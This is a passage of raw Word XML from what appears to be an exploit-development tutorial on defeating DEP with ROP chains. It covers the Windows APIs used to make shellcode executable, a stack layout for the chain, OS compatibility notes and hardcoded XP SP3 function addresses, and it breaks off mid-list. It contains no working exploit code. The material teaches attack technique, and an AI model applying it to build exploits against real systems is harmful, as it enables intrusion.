        <w:t xml:space="preserve">VirtualAlloc(MEM_COMMIT + PAGE_READWRITE_EXECUTE) </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">+ copy memory.  This will allow you to create a new executable memory region, copy your shellcode to it, and execute it. This technique may require you to chain 2 API’s into each other. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>HeapCreate</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(HEAP_CREATE_ENABLE_EXECUTE) + HeapAlloc() + copy memory. In essence, this function will provide a very similar technique as VirtualAlloc(), but may require 3 API’s to be chained together)) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>SetProcessDEPPolicy()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. This allows you to change the DEP policy for the current process (so you can execute the shellcode from the stack) (Vista SP1, XP SP3, Server 2008, and only when DEP Policy is set to OptIn or OptOut) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>NtSetInformationProcess()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  This function will change the DEP policy for the current process so you can execute your shellcode from the stack. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>VirtualProtect(PAGE_READ_WRITE_EXECUTE)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. This function will change the access protection level of a given memory page, allowing you to mark the location where your shellcode resides as executable. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>WriteProcessMemory().</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> This will allow you to copy your shellcode to another (executable) location, so you can jump to it and execute the shellcode. The target location must be writable and executable. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Each one of those functions requires the stack or registers to be set up in a specific way.  After all, when an API is called, it will assume that the parameters to the function are placed at the top of the stack (= at ESP). That means that your primary goal will be to craft these values on the stack, in a generic and reliable way, without executing any code from the stack itself.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>At the end (so after crafting the stack), you will most likely end up calling the API.  To make that call work, ESP must point at the API function parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Because we will be using gadgets (pointers to a series of instructions), which are placed on the stack as part of your payload/buffer, and because we are most likely going to return back to the stack all the time (or most of the times), it is very likely that, after building your entire rop chain to craft the parameters, your final result will *probably* look something like this :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2500" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="762"/>
        <w:gridCol w:w="4057"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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4057"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junk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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rop gadgets to craft the stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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ESP -&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="405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function pointer (to one of the Windows API’s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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xml:space="preserve">Function parameter </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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Function parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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Function parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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Maybe some more rop gadgets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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nops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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shellcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="762"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405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more data on the stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Right before the function gets called, ESP points to the Windows API function pointer. That pointer is directly followed by the parameters that are needed for the function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>At that time, a simple "RET" instruction will jump to that address. This will call the function and will make ESP shift with 4 bytes. If all goes well, the top of the stack (ESP) points at the function parameters, when the function is called.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="weapon"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr/>
        <w:t>Choose your weapon</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2543"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="839"/>
        <w:gridCol w:w="839"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1554"/>
        <w:gridCol w:w="1359"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543"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API / OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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XP SP2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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XP SP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="839"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Vista SP0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="839"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Vista SP1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114"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Windows 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1554"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Windows 2003 SP1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359"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Windows 2008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>VirtualAlloc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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695"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83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83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1114"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1554"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135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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543"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HeapCreate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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695"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83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83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1114"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1554"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135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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>SetProcessDEPPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>no (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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83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color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>no (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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1114"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color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>no (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1554"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color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>no (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>NtSetInformationProcess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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695"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83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83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color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>no (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114"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color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>no (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1554"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135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color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>no (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>VirtualProtect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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695"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83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83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1114"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1554"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135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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>WriteProcessMemory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695"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695"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83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83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1114"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1554"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c>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(1) = doesn’t exist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(2) = will fail because of default DEP Policy settings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Don’t worry about how to apply these techniques, things will become clear soon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="parameters"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr/>
        <w:t>Function parameters &amp; usage tips</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As stated earlier, when you want to use one of the available Windows API’s, you will have to set up the stack with the correct parameters for that function first.  What follows is a summary of all of these functions, their parameters, and some usage tips.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VirtualAlloc()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function will allocate new memory. One of the parameters to this function specifies the execution/access level of the newly allocated memory, so the goal is to set that value to EXECUTE_READWRITE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/aa366887(VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>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LPVOID WINAPI VirtualAlloc(</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__in_opt  LPVOID lpAddress,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SIZE_T dwSize,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DWORD flAllocationType,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DWORD flProtect</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function requires you to set up a stack that contains the following values :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1755"/>
        <w:gridCol w:w="7883"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755"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Return Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7883"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Function return address (= address where function needs to return to after it has finished). I will talk about this value in a few moments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755"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lpAddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7883"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Starting address of region to allocate (= new location where you want to allocate memory). Keep in mind that this address might get rounded to the nearest multiple of the allocation granularity.  You can try to put a provide a hardcoded value for this parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755"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dwSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7883"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Size of the region in bytes. (you will most likely need to generate this value using rop, unless your exploit can deal with null bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755"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flAllocationType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7883"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Set to 0x1000 (MEM_COMMIT). Might need rop to generate &amp; write this value to the stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755"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flProtect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7883"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Set to 0x40 (EXECUTE_READWRITE). Might need rop to generate &amp; write this value to the stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On XP SP3, this function is located at 0x7C809AF1 (kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the VirtualAlloc() call was successful, the address where the memory has been allocated, will be saved into eax.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Note : this function will only allocate new memory.  You will have to use a second API call to copy the shellcode into that new region and execute it.  So basically, you need a second rop chain to accomplish this. (In the table above, I mentioned that the return address parameter needs to point to the second rop chain. So basically, the return address to VirtualAlloc() needs to point to the rop chain that will copy your shellcode to the newly allocated region and then jump to it)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To do this, you can use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">memcpy()   (ntdll.dll) – 0x7C901DB3 on XP SP3 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">WriteProcessMemory()  (see later) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you, for example, want to use memcpy(), then you can hook both the VirtualAllocate() and memcpy() calls together and have them execute directly after each other, using the following setup :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First, the pointer to VirtualAlloc() must be at the top of the stack, which is then followed by the following values (parameters) on the stack :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
